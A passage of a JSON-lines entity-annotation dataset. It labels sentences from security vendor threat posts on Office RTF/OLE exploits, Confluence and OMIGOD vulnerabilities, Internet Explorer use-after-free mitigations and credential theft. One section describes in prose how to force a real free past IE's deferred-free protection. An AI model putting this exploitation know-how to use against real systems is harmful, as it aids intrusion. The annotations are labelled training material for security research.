execution.","entities":[{"id":46259,"label":"vulnerability","start_offset":48,"end_offset":62},{"id":46260,"label":"vulnerability","start_offset":128,"end_offset":141},{"id":46261,"label":"SOFTWARE","start_offset":178,"end_offset":193}],"relations":[],"Comments":[]} {"id":684,"text":"While still not seen in the wild, similar exploits in Microsoft Equation Editor, such as such as CVE-2018-0807 and CVE-2018-0798, were identified by Unit 42 researchers.","entities":[{"id":2275,"label":"identity","start_offset":149,"end_offset":156},{"id":44827,"label":"SOFTWARE","start_offset":54,"end_offset":79},{"id":44824,"label":"vulnerability","start_offset":97,"end_offset":110},{"id":44825,"label":"vulnerability","start_offset":115,"end_offset":128}],"relations":[{"id":29,"from_id":44827,"to_id":44825,"type":"has"},{"id":28,"from_id":44827,"to_id":44824,"type":"has"}],"Comments":[]} {"id":685,"text":"Note that since the Microsoft Equation Editor runs as its own process (eqnedt32.exe), protections specific to Microsoft Office such as EMET and Windows Defender Exploit Guard are not effective by default, as they only protect Microsoft Office processes (such as winword.exe). OLE Objects & HTA Handlers","entities":[{"id":46263,"label":"SOFTWARE","start_offset":144,"end_offset":174},{"id":46264,"label":"SOFTWARE","start_offset":20,"end_offset":45},{"id":46262,"label":"SOFTWARE","start_offset":110,"end_offset":126},{"id":46265,"label":"FILEPATH","start_offset":71,"end_offset":83},{"id":46266,"label":"SOFTWARE","start_offset":226,"end_offset":242},{"id":46267,"label":"FILEPATH","start_offset":262,"end_offset":273}],"relations":[],"Comments":[]} {"id":686,"text":"OLE Objects & HTA Handlers are mechanisms Office documents use to make references to include other documents in their content.","entities":[],"relations":[],"Comments":[]} {"id":687,"text":"They can be used to compromise an endpoint in the following way: This functionality was leveraged in exploitation of CVE-2017-0199 - a Microsoft Office\/WordPad remote code execution (RCE) vulnerability patched by Microsoft in September 2017, and was used in multiple campaigns, like this OilRig campaign.","entities":[{"id":2292,"label":"identity","start_offset":136,"end_offset":145},{"id":2293,"label":"tools","start_offset":146,"end_offset":152},{"id":2298,"label":"malware","start_offset":289,"end_offset":295},{"id":44828,"label":"vulnerability","start_offset":118,"end_offset":131},{"id":44830,"label":"campaign","start_offset":289,"end_offset":303},{"id":44829,"label":"TIME","start_offset":227,"end_offset":241},{"id":44831,"label":"tools","start_offset":136,"end_offset":152},{"id":44832,"label":"tools","start_offset":153,"end_offset":160}],"relations":[{"id":30,"from_id":44831,"to_id":44828,"type":"has"},{"id":31,"from_id":44832,"to_id":44828,"type":"has"},{"id":32,"from_id":44830,"to_id":44828,"type":"exploits"}],"Comments":[]} {"id":688,"text":"Figure 3.","entities":[],"relations":[],"Comments":[]} {"id":689,"text":"RTF files will look exactly like regular Word documents ","entities":[{"id":46268,"label":"SOFTWARE","start_offset":41,"end_offset":45}],"relations":[],"Comments":[]} {"id":690,"text":"In addition to the previous OLE & HTA exploit, attackers discovered RTF files can also execute ‘text\/html’ mime-type OLE objects using the MSHTML.","entities":[{"id":44833,"label":"vulnerability","start_offset":28,"end_offset":45}],"relations":[],"Comments":[]} {"id":691,"text":"This means that RTF documents expose the same attack surface as Internet Explorer!","entities":[{"id":46269,"label":"SOFTWARE","start_offset":64,"end_offset":81}],"relations":[],"Comments":[]} {"id":692,"text":"Leveraging this logical vulnerability, known as CVE-2018-8174, allows attackers to execute arbitrary HTML\/JavaScript\/VBScript.","entities":[{"id":46270,"label":"vulnerability","start_offset":48,"end_offset":61},{"id":46271,"label":"attack-pattern","start_offset":83,"end_offset":125}],"relations":[],"Comments":[]} {"id":693,"text":"While code executed in this way is ‘sandboxed’ (where it cannot run new processes or write to the filesystem etc.), like other code running from Internet Explorer","entities":[{"id":45799,"label":"SOFTWARE","start_offset":145,"end_offset":162}],"relations":[],"Comments":[]} {"id":694,"text":", this flaw can be used to leverage other vulnerabilities, such as a memory corruption UAF vulnerability in the VBScript engine, to gain arbitrary code execution in the context of the Word application (winword.exe), allowing them to gain control on the system.","entities":[{"id":46272,"label":"FILEPATH","start_offset":202,"end_offset":213},{"id":46273,"label":"SOFTWARE","start_offset":112,"end_offset":127},{"id":46274,"label":"SOFTWARE","start_offset":184,"end_offset":200}],"relations":[],"Comments":[]} {"id":695,"text":" Conclusion","entities":[],"relations":[],"Comments":[]} {"id":696,"text":"While document-based attacks have been a common attack vector for over a decade, we’re seeing a recent rise in their popularity and complexity.","entities":[],"relations":[],"Comments":[]} {"id":697,"text":"This rise may be a result of browser exploits becoming more difficult to use, due to the hardening done by browser developers.","entities":[],"relations":[],"Comments":[]} {"id":698,"text":"No matter the reason","entities":[],"relations":[],"Comments":[]} {"id":699,"text":", it is important that organizations know how to defend against these common techniques.","entities":[],"relations":[],"Comments":[]} {"id":700,"text":" Prevention Palo Alto Networks Traps advanced endpoint protection offers multiple methods of malware and exploit prevention to protect against these threats:","entities":[{"id":2316,"label":"identity","start_offset":12,"end_offset":30}],"relations":[],"Comments":[]} {"id":701,"text":" Sign up to receive the latest news, cyber threat intelligence and research from us Please enter your email address! Please mark, I'm not a robot!","entities":[],"relations":[],"Comments":[]} {"id":702,"text":"By submitting this form, you agree to our Terms of Use and acknowledge our Privacy Statement. ","entities":[],"relations":[],"Comments":[]} {"id":703,"text":"This has been a fun week.","entities":[],"relations":[],"Comments":[]} {"id":704,"text":"We have not had a significant cyber event like this – something that affects just about everybody on the Internet -- since the Kaminsky DNS vulnerability of 2008.","entities":[{"id":46276,"label":"vulnerability","start_offset":127,"end_offset":153},{"id":46275,"label":"TIME","start_offset":157,"end_offset":161}],"relations":[],"Comments":[]} {"id":705,"text":"Everybody I know has been scrambling to understand what it means to their organization, to their business and to their immediate family.","entities":[],"relations":[],"Comments":[]} {"id":706,"text":"Yes, I said family.","entities":[],"relations":[],"Comments":[]} {"id":707,"text":"I am sure I am not the only one who has answered a question or two from his mother-in-law about how the Internet is melting down based on what she’s been reading in the press.","entities":[],"relations":[],"Comments":[]} {"id":708,"text":" There’s a lot out there already about what Heartbleed means for the Web and beyond, and I’ll point you to our own analysis written by Scott Simkin or an essay by Dan Goodin over at ars technica for that explanation.","entities":[{"id":44834,"label":"identity","start_offset":135,"end_offset":147},{"id":44835,"label":"identity","start_offset":163,"end_offset":173},{"id":44836,"label":"identity","start_offset":182,"end_offset":194},{"id":44837,"label":"vulnerability","start_offset":44,"end_offset":54}],"relations":[],"Comments":[]} {"id":709,"text":"Instead, here are eight things I am doing right now to protect Palo Alto Networks and my home (and mother-in-law) and that you should be doing, too:","entities":[{"id":46277,"label":"identity","start_offset":63,"end_offset":81}],"relations":[],"Comments":[]} {"id":710,"text":" If there’s a long-term consideration here, it’s to install perfect forward secrecy, as Twitter did last year.","entities":[{"id":46278,"label":"SOFTWARE","start_offset":88,"end_offset":95}],"relations":[],"Comments":[]} {"id":711,"text":"That ensures that a session key derived from a stolen private key and a collected public key in the future will not be compromised.","entities":[],"relations":[],"Comments":[]} {"id":712,"text":" For more: Sign up to receive the latest news, cyber threat intelligence and research from us Please enter your email address!","entities":[],"relations":[],"Comments":[]} {"id":713,"text":" Please mark, I'm not a robot!","entities":[],"relations":[],"Comments":[]} {"id":714,"text":"By submitting this form, you agree to our Terms of Use and acknowledge our Privacy Statement. ","entities":[],"relations":[],"Comments":[]} {"id":715,"text":"This post is also available in: 日本語 (Japanese) On Aug. 25, 2021, Atlassian released a security advisory for an injection vulnerability in Confluence Server and Data Center, CVE-2021-26084.","entities":[{"id":46281,"label":"vulnerability","start_offset":179,"end_offset":193},{"id":46282,"label":"SOFTWARE","start_offset":144,"end_offset":177},{"id":46279,"label":"identity","start_offset":71,"end_offset":80},{"id":46280,"label":"TIME","start_offset":56,"end_offset":69}],"relations":[{"id":178,"from_id":46282,"to_id":46281,"type":"has"}],"Comments":[]} {"id":716,"text":"If the vulnerability is exploited, threat actors could bypass authentication and run arbitrary code on unpatched systems.","entities":[{"id":46283,"label":"attack-pattern","start_offset":55,"end_offset":76},{"id":46284,"label":"attack-pattern","start_offset":81,"end_offset":99}],"relations":[],"Comments":[]} {"id":717,"text":"Since the release of this advisory, mass scanning activity has started to occur, seeking unpatched systems, and in-the-wild exploitation has begun.","entities":[],"relations":[],"Comments":[]} {"id":718,"text":"Unit 42 recommends customers upgrade to the latest release of Confluence Server and Data Center.","entities":[{"id":46285,"label":"identity","start_offset":0,"end_offset":7},{"id":46286,"label":"SOFTWARE","start_offset":62,"end_offset":95}],"relations":[],"Comments":[]} {"id":719,"text":" The Atlassian products vulnerable to CVE-2021-26084 are those using the following versions of Confluence Server and Data Center: Confluence Cloud customers are not affected by this vulnerability.","entities":[{"id":46287,"label":"identity","start_offset":5,"end_offset":14},{"id":46288,"label":"vulnerability","start_offset":38,"end_offset":52},{"id":46290,"label":"SOFTWARE","start_offset":131,"end_offset":147},{"id":46289,"label":"SOFTWARE","start_offset":95,"end_offset":128}],"relations":[{"id":180,"from_id":46289,"to_id":46288,"type":"has"}],"Comments":[]} {"id":720,"text":" We recommend that customers update Atlassian Confluence Server and Data Center to the latest version, 7.13.0 (TLS).","entities":[{"id":44838,"label":"SOFTWARE","start_offset":36,"end_offset":79}],"relations":[],"Comments":[]} {"id":721,"text":"You can find the newest release on Atlassian’s download center.","entities":[{"id":46291,"label":"identity","start_offset":35,"end_offset":44}],"relations":[],"Comments":[]} {"id":722,"text":" If you cannot install the latest upgrade, see the Mitigation section on the Atlassian security advisory for information on how to mitigate this vulnerability by running a script for the operating system your Confluence server is hosted on. Palo Alto Networks provides protection against the exploitation of this vulnerability: Palo Alto Networks will update this Threat Brief with new information and recommendations as they become available.","entities":[{"id":46292,"label":"identity","start_offset":77,"end_offset":86},{"id":46293,"label":"SOFTWARE","start_offset":209,"end_offset":219},{"id":46294,"label":"identity","start_offset":242,"end_offset":260},{"id":46295,"label":"identity","start_offset":330,"end_offset":348}],"relations":[],"Comments":[]} {"id":723,"text":" writeups\/Confluence-RCE.md at main · httpvoid\/writeups Confluence Server Download Archives Confluence Security Advisory - 2021-08-25 | Confluence Data Center and Server 7.13 ","entities":[{"id":46296,"label":"TIME","start_offset":125,"end_offset":135},{"id":46297,"label":"SOFTWARE","start_offset":138,"end_offset":177},{"id":44839,"label":"FILEPATH","start_offset":1,"end_offset":27},{"id":44841,"label":"SOFTWARE","start_offset":57,"end_offset":74},{"id":44842,"label":"SOFTWARE","start_offset":94,"end_offset":104}],"relations":[],"Comments":[]} {"id":724,"text":"Sign up to receive the latest news, cyber threat intelligence and research from us Please enter your email address!","entities":[],"relations":[],"Comments":[]} {"id":725,"text":" Please mark, I'm not a robot! By submitting this form, you agree to our Terms of Use and acknowledge our Privacy Statement.","entities":[],"relations":[],"Comments":[]} {"id":726,"text":"This post is also available in: 日本語 (Japanese) On Sept. 14, 2021, Microsoft’s Security Response Center (MSRC) released security patches detailing the findings of four critical vulnerabilities affecting the Microsoft Azure package Open Management Infrastructure (OMI).","entities":[{"id":46298,"label":"TIME","start_offset":56,"end_offset":70},{"id":44843,"label":"identity","start_offset":72,"end_offset":115},{"id":44844,"label":"SOFTWARE","start_offset":212,"end_offset":272}],"relations":[],"Comments":[]} {"id":727,"text":"The open-source OMI package is designed to provide a portable infrastructure backbone for web-based management tools, such as diagnostic monitoring, log analytic services and automation functionality within UNIX and Linux systems.","entities":[{"id":46299,"label":"SOFTWARE","start_offset":207,"end_offset":211},{"id":46301,"label":"SOFTWARE","start_offset":16,"end_offset":27},{"id":46300,"label":"SOFTWARE","start_offset":216,"end_offset":221}],"relations":[],"Comments":[]} {"id":728,"text":"OMI is used by Microsoft Azure to manage UNIX packages within Azure virtual machines (VMs), containers and serverless cloud instances.","entities":[{"id":46302,"label":"SOFTWARE","start_offset":0,"end_offset":3},{"id":46305,"label":"SOFTWARE","start_offset":62,"end_offset":90},{"id":46303,"label":"SOFTWARE","start_offset":15,"end_offset":30},{"id":46304,"label":"SOFTWARE","start_offset":41,"end_offset":45}],"relations":[],"Comments":[]} {"id":729,"text":"According to Microsoft’s security release notes, any system created, or which has updated its OMI package, after Aug. 11, 2021, should automatically be patched.","entities":[{"id":44845,"label":"TIME","start_offset":113,"end_offset":126},{"id":44846,"label":"identity","start_offset":13,"end_offset":23}],"relations":[],"Comments":[]} {"id":730,"text":" The four critical vulnerabilities discovered by security researchers from Wiz include one unauthenticated remote code execution (RCE) and three privilege escalation vulnerabilities. Dubbed OMIGOD, the four vulnerabilities were found to directly affect Azure cloud instances using the following Azure services: Prisma Cloud Compute Defender agents can detect whether any Azure system is vulnerable to any of the four CVEs.","entities":[{"id":46306,"label":"attack-pattern","start_offset":91,"end_offset":135},{"id":46311,"label":"SOFTWARE","start_offset":313,"end_offset":342},{"id":46307,"label":"attack-pattern","start_offset":145,"end_offset":165},{"id":46309,"label":"SOFTWARE","start_offset":254,"end_offset":265},{"id":46310,"label":"SOFTWARE","start_offset":296,"end_offset":310},{"id":46313,"label":"SOFTWARE","start_offset":373,"end_offset":378},{"id":46308,"label":"vulnerability","start_offset":191,"end_offset":197}],"relations":[],"Comments":[]} {"id":731,"text":"Additionally, Prisma Cloud users can also build a custom vulnerability detection rule to identify if any system is running an OMI package with a version previous to 1.6.8.1.","entities":[{"id":46314,"label":"SOFTWARE","start_offset":14,"end_offset":26},{"id":46315,"label":"SOFTWARE","start_offset":126,"end_offset":129}],"relations":[],"Comments":[]} {"id":732,"text":" To build a custom vulnerability detection rule, open Prisma Cloud and navigate to the following page: name,type,package,minVersionInclusive,maxVersionInclusive,md5 OMIGOD,package,omi,*,1.6.8.0, Palo Alto Networks Azure-based VM- and CN-Series Firewall instances do not use the OMI package and are not vulnerable to the OMI critical vulnerabilities.","entities":[{"id":46318,"label":"identity","start_offset":197,"end_offset":215},{"id":46319,"label":"SOFTWARE","start_offset":216,"end_offset":221},{"id":46321,"label":"SOFTWARE","start_offset":322,"end_offset":325},{"id":46317,"label":"vulnerability","start_offset":166,"end_offset":172},{"id":46316,"label":"SOFTWARE","start_offset":54,"end_offset":66},{"id":46320,"label":"SOFTWARE","start_offset":280,"end_offset":283}],"relations":[],"Comments":[]} {"id":733,"text":" Prisma Cloud will create an alert for any system which maintains an OMI package vulnerable to the OMI critical vulnerabilities.","entities":[{"id":46322,"label":"SOFTWARE","start_offset":1,"end_offset":13},{"id":46324,"label":"SOFTWARE","start_offset":99,"end_offset":102},{"id":46323,"label":"SOFTWARE","start_offset":69,"end_offset":73}],"relations":[],"Comments":[]} {"id":734,"text":"Should a system be identified as vulnerable, the following steps should be taken for that Azure Cloud Instance:","entities":[{"id":46325,"label":"SOFTWARE","start_offset":90,"end_offset":101}],"relations":[],"Comments":[]} {"id":735,"text":"On Sept. 14, 2021, security researchers from Wiz released a report detailing the findings of four critical vulnerabilities affecting the Microsoft Azure package OMI.","entities":[{"id":46326,"label":"identity","start_offset":45,"end_offset":48},{"id":44849,"label":"TIME","start_offset":3,"end_offset":17},{"id":44851,"label":"SOFTWARE","start_offset":137,"end_offset":164}],"relations":[],"Comments":[]} {"id":736,"text":"Dubbed OMIGOD, the four vulnerabilities were found to directly affect Azure Cloud Instances.","entities":[{"id":46327,"label":"vulnerability","start_offset":7,"end_offset":13},{"id":46328,"label":"SOFTWARE","start_offset":70,"end_offset":81}],"relations":[{"id":181,"from_id":46328,"to_id":46327,"type":"has"}],"Comments":[]} {"id":737,"text":"Palo Alto Networks Azure-based VM and CN Series Firewall instances do not use the OMI package and are not vulnerable to the OMI critical vulnerabilities.","entities":[{"id":46331,"label":"SOFTWARE","start_offset":82,"end_offset":85},{"id":46330,"label":"SOFTWARE","start_offset":19,"end_offset":24},{"id":46329,"label":"identity","start_offset":0,"end_offset":18},{"id":46332,"label":"SOFTWARE","start_offset":124,"end_offset":127}],"relations":[],"Comments":[]} {"id":738,"text":"Customers of Prisma Cloud have the ability to create alerts to detect vulnerabilities.","entities":[{"id":44852,"label":"SOFTWARE","start_offset":13,"end_offset":25}],"relations":[],"Comments":[]} {"id":739,"text":" Sign up to receive the latest news, cyber threat intelligence and research from us Please enter your email address!","entities":[],"relations":[],"Comments":[]} {"id":740,"text":" Please mark, I'm not a robot! By submitting this form, you agree to our Terms of Use and acknowledge our Privacy Statement.","entities":[],"relations":[],"Comments":[]} {"id":741,"text":"Use-after-free bugs have affected Internet Explorer for years.","entities":[{"id":46333,"label":"SOFTWARE","start_offset":34,"end_offset":51}],"relations":[],"Comments":[]} {"id":742,"text":"In the past year alone, Microsoft patched 122 IE vulnerabilities, the majority of which were use-after-free bugs.","entities":[{"id":46334,"label":"identity","start_offset":24,"end_offset":33}],"relations":[],"Comments":[]} {"id":743,"text":"This year Microsoft has already patched 126 IE vulnerabilities to date.","entities":[{"id":46335,"label":"identity","start_offset":10,"end_offset":19}],"relations":[],"Comments":[]} {"id":744,"text":"Of those vulnerabilities, 4 were actively being exploited in the wild.","entities":[],"relations":[],"Comments":[]} {"id":745,"text":"These 4 exploits (CVE-2014-1815, CVE-2014-1776, CVE-2014-0322, CVE-2014-0324) were all based on use-after-free bugs.","entities":[{"id":46336,"label":"vulnerability","start_offset":18,"end_offset":31},{"id":46337,"label":"vulnerability","start_offset":33,"end_offset":46},{"id":46339,"label":"vulnerability","start_offset":63,"end_offset":76},{"id":46338,"label":"vulnerability","start_offset":48,"end_offset":61}],"relations":[],"Comments":[]} {"id":746,"text":" To deal with the increasing number of use-after-free bugs and associated exploits, Microsoft introduced a series of new control mechanisms in the most recent Internet Explorer patches.","entities":[{"id":46340,"label":"identity","start_offset":84,"end_offset":93},{"id":46341,"label":"SOFTWARE","start_offset":159,"end_offset":176}],"relations":[],"Comments":[]} {"id":747,"text":"In June, Microsoft introduced a new isolated heap mechanism to solve the usage issue of use-after-free exploitation.","entities":[{"id":44853,"label":"identity","start_offset":9,"end_offset":18},{"id":44854,"label":"attack-pattern","start_offset":88,"end_offset":115}],"relations":[],"Comments":[]} {"id":748,"text":"They followed that up In July by implementing a deferred free method to solve the freeing issue of use-after-free bugs.","entities":[{"id":46342,"label":"TIME","start_offset":25,"end_offset":29},{"id":46343,"label":"attack-pattern","start_offset":99,"end_offset":113}],"relations":[],"Comments":[]} {"id":749,"text":" The main concept of an isolated heap is simple.","entities":[],"relations":[],"Comments":[]} {"id":750,"text":"It allocates a dedicated heap for select critical objects to use that is separate from other heaps that a user can directly access.","entities":[],"relations":[],"Comments":[]} {"id":751,"text":"The heap block will not be occupied by user-controlled data after the critical objects are freed.","entities":[],"relations":[],"Comments":[]} {"id":752,"text":"This mechanism prevents precise control of the data of a freed object from further exploitation.","entities":[],"relations":[],"Comments":[]} {"id":753,"text":" Figure 1. _g_hIsolatedHeap handle used for isolated heap ","entities":[],"relations":[],"Comments":[]} {"id":754,"text":"The isolated heap was applied to many but not all internal objects, leaving some still vulnerable.","entities":[],"relations":[],"Comments":[]} {"id":755,"text":"To address this, Microsoft introduced another protection method of deferred free named ProtectedFree.","entities":[{"id":46344,"label":"identity","start_offset":17,"end_offset":26}],"relations":[],"Comments":[]} {"id":756,"text":"They encapsulate this method and apply it to almost every object in mshtml.dll.","entities":[{"id":44855,"label":"FILEPATH","start_offset":68,"end_offset":78}],"relations":[],"Comments":[]} {"id":757,"text":"In IE9, for example, it has been applied to every object through MemoryProtection::HeapFree as shown in figure 2.","entities":[{"id":46345,"label":"SOFTWARE","start_offset":3,"end_offset":6}],"relations":[],"Comments":[]} {"id":758,"text":"Figure 2.","entities":[],"relations":[],"Comments":[]} {"id":759,"text":"References of MemoryProtection::HeapFree ","entities":[],"relations":[],"Comments":[]} {"id":760,"text":"The main idea of this protection mechanism is to delay the freeing action so that the intruder is unable to determine when they can occupy the freed object using controlled data.","entities":[],"relations":[],"Comments":[]} {"id":761,"text":"In this new patch, every time Internet Explorer tries to free an object, it is not freed immediately.","entities":[{"id":46346,"label":"SOFTWARE","start_offset":30,"end_offset":47}],"relations":[],"Comments":[]} {"id":762,"text":"Instead, the block to be freed is marked and filled with 0x00 data and added to a pool.","entities":[],"relations":[],"Comments":[]} {"id":763,"text":"When the size of the pool hits a predefined threshold, which is currently 100k (0x186A0 as highlighted in figure 3), it performs the real freeing operation (ReclaimUnmarkedBlocks). Figure 3.","entities":[],"relations":[],"Comments":[]} {"id":764,"text":"C++ style pseudo code of ProtectedFree function ","entities":[],"relations":[],"Comments":[]} {"id":765,"text":"Microsoft stores the to-be-freed blocks in a structure called st_ProtecFreeManageHeap.","entities":[{"id":44856,"label":"identity","start_offset":0,"end_offset":9}],"relations":[],"Comments":[]} {"id":766,"text":"This structure is created in the function MemoryProtection::CMemoryProtector::ProtectCurrentThread and is used to manage deferred free heap blocks.","entities":[],"relations":[],"Comments":[]} {"id":767,"text":"Figure 4 shows an example of the structure in memory.","entities":[],"relations":[],"Comments":[]} {"id":768,"text":" Figure 4. st_ProtecFreeManageHeap Figure 5 provides an alternate view of the structure in a C style code block.","entities":[],"relations":[],"Comments":[]} {"id":769,"text":" Figure 5. C style code of st_ProtecFreeManageHeap ","entities":[],"relations":[],"Comments":[]} {"id":770,"text":"If we were able to make the size of the current heap block in this structure larger than the threshold of 0x186A0 bytes and trigger CMemoryProtector::ProtectedFree, it is still possible to force a true freeing action and occupy the freed object with other data as we show in the following piece of javascript code in figure 6. Figure 6. Javascript proof of concept to force freeing When creating the anchor element, the debug logs are shown in figure 7.","entities":[{"id":46347,"label":"SOFTWARE","start_offset":340,"end_offset":350}],"relations":[],"Comments":[]} {"id":771,"text":"The address of the anchor element is 0x0c3b3f98.","entities":[],"relations":[],"Comments":[]} {"id":772,"text":"Figure 7:","entities":[],"relations":[],"Comments":[]} {"id":773,"text":"Before free We then manually decrease the reference number, so the CMemoryProtector::ProtectedFree function will fill the block with 0’s, but the object is still not freed.","entities":[],"relations":[],"Comments":[]} {"id":774,"text":"Figure 8: decrease the reference number, not yet freed ","entities":[],"relations":[],"Comments":[]} {"id":775,"text":"Finally we make the size of the CMemoryProtector::ProtectedFree management structure larger than 0x186a0 forcing the freeing operation.","entities":[],"relations":[],"Comments":[]} {"id":776,"text":" Figure 9: field “TotalMemorySize” of st_ProtecFreeManageHeap is greater than threshold ","entities":[],"relations":[],"Comments":[]} {"id":777,"text":"The anchor element is now actually freed as shown in figure 10.","entities":[],"relations":[],"Comments":[]} {"id":778,"text":"Figure 10: object is in the free list now ","entities":[],"relations":[],"Comments":[]} {"id":779,"text":"From a researchers' point of view, deferred free created a few problems, one of the major ones being that the page heap feature may not work correctly.","entities":[],"relations":[],"Comments":[]} {"id":780,"text":"Page heap is a useful feature for debugging.","entities":[],"relations":[],"Comments":[]} {"id":781,"text":"When page heap is turned on, the system allows only one object in one memory page.","entities":[],"relations":[],"Comments":[]} {"id":782,"text":"Once this object is freed the whole page is marked as invalid.","entities":[],"relations":[],"Comments":[]} {"id":783,"text":"So the next time IE tries to access a freed object an invalid address exception would be raised.","entities":[{"id":46348,"label":"SOFTWARE","start_offset":17,"end_offset":20}],"relations":[],"Comments":[]} {"id":784,"text":"This mechanism is extremely helpful when researchers are trying to find use-after-free bugs.","entities":[],"relations":[],"Comments":[]} {"id":785,"text":" With the introduction of the deferred free patch the object is no longer truly freed, so the page still exists.","entities":[],"relations":[],"Comments":[]} {"id":786,"text":"In this situation the researcher is no longer able to determine whether a use-after-free behavior has occurred because no exception would be thrown out.","entities":[],"relations":[],"Comments":[]} {"id":787,"text":"To reduce the impact of the deferred free patch, a research may consider patching the mshtml.dll in memory.","entities":[{"id":46349,"label":"FILEPATH","start_offset":86,"end_offset":96}],"relations":[],"Comments":[]} {"id":788,"text":"For example, you can call MemoryProtection::CMemoryProtector::UnprotectProcess before you perform any fuzzing tasks.","entities":[{"id":46350,"label":"attack-pattern","start_offset":102,"end_offset":109}],"relations":[],"Comments":[]} {"id":789,"text":" The recent patches and introduction of isolated heap and deferred free are strong signs that Microsoft plans to address the fundamentals of use-after-free exploitation in a preventative manner rather than to passively patch the vulnerabilities as they are discovered.","entities":[{"id":44857,"label":"identity","start_offset":94,"end_offset":103},{"id":44858,"label":"attack-pattern","start_offset":141,"end_offset":168}],"relations":[],"Comments":[]} {"id":790,"text":"From the results of our research, applications of such methods can effectively stop unpatched use-after-free attacks.","entities":[{"id":46351,"label":"attack-pattern","start_offset":94,"end_offset":116}],"relations":[],"Comments":[]} {"id":791,"text":"It can also make the exploitations of heap overflows or type confusion bugs significantly more difficult.","entities":[{"id":46353,"label":"attack-pattern","start_offset":21,"end_offset":52}],"relations":[],"Comments":[]} {"id":792,"text":"But this is not the end.","entities":[],"relations":[],"Comments":[]} {"id":793,"text":" For the foreseeable future, Microsoft may introduce more defensive mechanisms against use-after-free bugs or even heap fengshui to reduce the risk of being exploited.","entities":[{"id":46354,"label":"identity","start_offset":29,"end_offset":38}],"relations":[],"Comments":[]} {"id":794,"text":"Could it be game over for use-after-free exploitation, or it is just the beginning of another cat and mouse game?","entities":[],"relations":[],"Comments":[]} {"id":795,"text":"Time will tell.","entities":[],"relations":[],"Comments":[]} {"id":796,"text":" Sign up to receive the latest news, cyber threat intelligence and research from us Please enter your email address!","entities":[],"relations":[],"Comments":[]} {"id":797,"text":" Please mark, I'm not a robot!","entities":[],"relations":[],"Comments":[]} {"id":798,"text":"By submitting this form, you agree to our Terms of Use and acknowledge our Privacy Statement. ","entities":[],"relations":[],"Comments":[]} {"id":799,"text":"Today we’re releasing a new Unit 42 white paper titled “Credential-Based Attacks: Exposing the Ecosystem and Motives Behind Credential Phishing, Theft and Abuse.”","entities":[{"id":2601,"label":"identity","start_offset":28,"end_offset":35},{"id":2604,"label":"attack-pattern","start_offset":135,"end_offset":143}],"relations":[],"Comments":[]} {"id":800,"text":"In this paper, we look at the problem of credential theft by exploring how it happens, what attackers do with credentials once they’ve stolen them, and what you can do to help prevent credential-based attacks.","entities":[{"id":46355,"label":"attack-pattern","start_offset":184,"end_offset":208}],"relations":[],"Comments":[]} {"id":801,"text":" Credentials and authentication have become synonymous, with valid credentials allowing access to sensitive resources.","entities":[],"relations":[],"Comments":[]} {"id":802,"text":"Adversaries are increasingly stealing and using credentials as part of their playbooks; impersonating legitimate users to access a company’s most sensitive information, erase data on servers, and reconfigure them so that they can’t boot; and undertake other malicious activities.","entities":[],"relations":[],"Comments":[]} {"id":803,"text":"Stolen credentials underpin some of the most critical and damaging attacks out there; both Shamoon 2 and the Sofacy threat actor group, for example, have made detailed use of credential theft.","entities":[{"id":46358,"label":"attack-pattern","start_offset":175,"end_offset":191},{"id":46356,"label":"threat-actor","start_offset":109,"end_offset":134},{"id":46357,"label":"threat-actor","start_offset":91,"end_offset":100}],"relations":[{"id":182,"from_id":46357,"to_id":46358,"type":"uses"},{"id":183,"from_id":46356,"to_id":46358,"type":"uses"}],"Comments":[]} {"id":804,"text":" Credential theft today can happen in many ways, but the most notable are through credential phishing and the use of malware like keyloggers (both staples of the Sofacy group), as well as password reuse.","entities":[{"id":44859,"label":"attack-pattern","start_offset":1,"end_offset":17},{"id":44860,"label":"attack-pattern","start_offset":82,"end_offset":101},{"id":44861,"label":"attack-pattern","start_offset":130,"end_offset":140},{"id":44862,"label":"threat-actor","start_offset":162,"end_offset":174},{"id":44863,"label":"attack-pattern","start_offset":188,"end_offset":202}],"relations":[{"id":33,"from_id":44862,"to_id":44863,"type":"uses"},{"id":34,"from_id":44862,"to_id":44861,"type":"uses"},{"id":35,"from_id":44862,"to_id":44860,"type":"uses"},{"id":36,"from_id":44862,"to_id":44859,"type":"uses"}],"Comments":[]} {"id":805,"text":"The impact of a successful credential theft is, ultimately, access and authorization.","entities":[{"id":46359,"label":"attack-pattern","start_offset":27,"end_offset":43}],"relations":[],"Comments":[]} {"id":806,"text":"Attackers will use credential theft for remote access to an organization, to access cloud-based resources (which may have weaker credential protections than network-based resources), or to move laterally within an organization once they’ve gained entry.","entities":[{"id":46360,"label":"attack-pattern","start_offset":19,"end_offset":35}],"relations":[],"Comments":[]} {"id":807,"text":"The most sophisticated attacks can – and do – blend these actions together, sometimes using multiple stolen credentials to penetrate networks, move laterally within them, elevate privileges, and then access and steal data. Prevention of credential theft is too often overlooked.","entities":[{"id":46361,"label":"attack-pattern","start_offset":238,"end_offset":254},{"id":44864,"label":"attack-pattern","start_offset":101,"end_offset":119},{"id":44865,"label":"attack-pattern","start_offset":143,"end_offset":157},{"id":44866,"label":"attack-pattern","start_offset":171,"end_offset":188},{"id":44867,"label":"attack-pattern","start_offset":200,"end_offset":221}],"relations":[],"Comments":[]} {"id":808,"text":"Organizations should continue with user education to help users better spot and not fall for phishing and spam attacks.","entities":[{"id":46362,"label":"attack-pattern","start_offset":93,"end_offset":118}],"relations":[],"Comments":[]} {"id":809,"text":"You and your employees can also use password managers to make unique, complex passwords for each site not just a goal but a reality.","entities":[],"relations":[],"Comments":[]} {"id":810,"text":"Technology is also catching up; recent advances in two-factor\/multi-factor authentication (2FA\/MFA) and one-time passwords (OTP) represent the best long-term approaches to preventing credential theft.","entities":[{"id":46363,"label":"attack-pattern","start_offset":183,"end_offset":199}],"relations":[],"Comments":[]} {"id":811,"text":"(Our newest release, PAN-OS 8.0, also includes protections to significantly limit or eliminate password reuse.)","entities":[],"relations":[],"Comments":[]} {"id":812,"text":"Get your copy of our white paper here.","entities":[],"relations":[],"Comments":[]} {"id":813,"text":" Ignite '17 Security Conference: Vancouver, BC June 12–15, 2017 Ignite '17 Security Conference is a live, four-day conference designed for today’s security professionals.","entities":[{"id":46365,"label":"TIME","start_offset":47,"end_offset":63},{"id":46366,"label":"location","start_offset":33,"end_offset":46}],"relations":[],"Comments":[]} {"id":814,"text":"Hear from innovators and experts, gain real-world skills through hands-on sessions and interactive workshops, and find out how breach prevention is changing the security industry.","entities":[],"relations":[],"Comments":[]} {"id":815,"text":"Visit the Ignite website for more information on tracks, workshops and marquee sessions.","entities":[],"relations":[],"Comments":[]} {"id":816,"text":" Sign up to receive the latest news, cyber threat intelligence and research from us Please enter your 